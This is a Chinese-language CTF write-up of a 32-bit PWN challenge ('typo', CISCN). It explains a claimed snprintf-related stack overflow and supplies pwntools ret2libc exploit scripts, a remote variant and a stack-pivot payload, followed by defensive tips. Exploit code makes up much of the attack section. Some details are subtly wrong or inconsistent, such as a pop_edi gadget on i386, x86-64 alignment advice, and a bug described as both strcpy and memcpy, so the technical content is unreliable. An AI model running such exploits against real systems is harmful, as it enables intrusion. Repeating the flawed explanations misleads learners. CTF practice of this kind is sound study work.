CTF PWN题解析:snprintf栈溢出漏洞利用实战 1. 赛事背景与题目定位CISCN全国大学生信息安全竞赛作为国内最高规格的CTF赛事之一其PWN题型历来是检验二进制漏洞利用能力的试金石。第19届赛事中的typo题目以经典的栈溢出漏洞为载体却通过精心设计的陷阱考验选手对格式化字符串函数snprintf的深入理解。这道被标记为入门级的题目实际上暗藏了多个新手容易忽略的细节陷阱。从BUU CTF平台的历史解题数据来看同类题型如rip等基础PWN题的正确率不足40%反映出即使是有一定基础的选手在面对看似简单的栈溢出时仍会因细节处理不当而翻车。这道typo题目更是通过故意留出的typo打字错误作为突破口要求选手具备逆向思维——不仅要发现漏洞更要理解出题人设置的错误背后的真实意图。2. 环境搭建与逆向分析2.1 题目文件处理首先从赛事平台获取题目压缩包解压后得到以下关键文件typo32位ELF可执行文件可通过file typo确认typo.c疑似源代码实际可能不完整或有误导libc.so.6配套的libc库文件使用patchelf修正库路径patchelf --set-interpreter /path/to/ld-linux.so.2 --set-rpath /path/to/libs/ typo2.2 基础逆向工程通过IDA Pro加载typo文件快速定位到main函数反编译结果。关键代码段显示如下特征char buf[0x100]; snprintf(buf, sizeof(buf), Welcome %s, input);表面看是简单的欢迎语拼接但存在三个致命细节sizeof(buf)在编译时被替换为0x100但snprintf的返回值处理被忽略后续存在未经验证的strcpy操作程序编译时未开启PIE保护可通过checksec验证关键发现出题人故意在源码注释中留下typo here提示实际指向snprintf长度参数的错误使用方式。这种错误恰恰是漏洞利用的关键。3. 漏洞原理深度剖析3.1 snprintf的魔鬼细节格式化字符串函数snprintf的返回值特性是本题的核心考点int snprintf(char *str, size_t size, const char *format, ...);其返回值是假设缓冲区足够大时会写入的字符总数而非实际写入量。这意味着当Welcome input的总长度超过0x100时返回值会大于0x100后续代码若直接使用该返回值作为拷贝长度就会导致栈溢出3.2 漏洞触发链条完整的漏洞利用路径如下输入超长字符串使snprintf返回大于0x100的值程序未校验返回值直接用于memcpy操作精心构造的输入覆盖返回地址控制EIP跳转到预设的gadget地址通过cyclic模式字符串确认溢出偏移量from pwn import * p process(./typo) p.sendline(cyclic(300)) p.wait() # 用dmesg查看崩溃时eip的值4. 利用方案设计与调试4.1 栈布局重建通过gdb-peda进行动态调试关键步骤gdb-peda$ pattern create 300 gdb-peda$ r input.txt gdb-peda$ x/wx $esp确定返回地址的偏移量为140字节。但需要注意不同libc版本中环境变量会影响栈地址需要根据实际运行时的栈地址调整payload4.2 ROP链构造由于题目提供了libc可采用ret2libc方案泄露libc基地址通过putsgot计算system和/bin/sh的真实地址构造二次攻击链典型payload结构payload flat( bA*140, pop_edi_ret, puts_got, puts_plt, main_addr, )4.3 对抗防护机制题目开启了NX保护但未开启ASLR可通过cat /proc/sys/kernel/randomize_va_space确认。需要特别注意所有gadget地址需通过ropper --file typo重新验证在远程环境可能因libc差异导致偏移量变化使用LibcSearcher库处理不同版本的libc5. 完整攻击脚本实现5.1 本地测试版本from pwn import * context(archi386, oslinux) p process(./typo) puts_plt 0x08048370 puts_got 0x0804a018 main 0x08048596 payload flat( bA*140, puts_plt, main, puts_got ) p.sendlineafter(name:, payload) leak u32(p.recv(4)) libc_base leak - 0x5f140 # 根据实际libc版本调整 system libc_base 0x3a940 binsh libc_base 0x15902b payload2 flat( bA*140, system, 0xdeadbeef, # 虚假返回地址 binsh ) p.sendline(payload2) p.interactive()5.2 远程攻击适配针对赛事服务器需要添加以下调整libc ELF(./libc.so.6) # 使用题目提供的libc rop ROP(./typo) def remote_exp(): p remote(target.ip, port) # 通过泄露地址计算实际偏移 leak u32(p.recvuntil(\x7f)[-4:]) libc.address leak - libc.sym[puts] rop.call(libc.sym[system], [next(libc.search(b/bin/sh))]) payload fit({140:rop.chain()}) p.sendline(payload)6. 踩坑实录与补救方案6.1 常见失败场景分析栈对齐问题 在调用system前需要保证栈指针16字节对齐。解决方案rop.raw(AAAA) # 补充对齐 rop.call(system, [binsh])输入过滤绕过 题目可能对输入字符进行过滤。可通过以下方式检测ltrace -i ./typo input.txt若发现异常截断需采用编码或分段写入技术环境差异问题 本地成功但远程失败时务必检查libc版本差异通过ldd typo确认网络字节序处理服务器端的输入缓冲机制6.2 高级技巧栈迁移技术当溢出空间不足时可采用栈迁移技术leave_ret 0x08048458 # 通过ROPgadget查找 fake_ebp 0x0804a800 # 可写的bss段地址 payload flat( bA*132, fake_ebp, leave_ret )通过控制EBP实现栈帧转移为后续ROP链创造空间7. 防御方案与学习延伸7.1 安全开发建议从开发者角度预防此类漏洞始终检查snprintf返回值使用strlcpy替代strcpy编译时添加-fstack-protector-strong选项静态分析工具扫描gcc -Wall -Wextra -Wformat-security typo.c7.2 进阶学习路径格式化字符串漏洞扩展研究printf系列函数的格式化字符串漏洞练习%n写入技术的利用防护机制突破学习绕过ASLR的地址泄露技术研究ROP链的自动化生成工具如ROPgadget同类题目推荐BUU CTF的rip系列题目Pwnable.kr的simple_loginHackTheBox的Stack缓冲区溢出靶机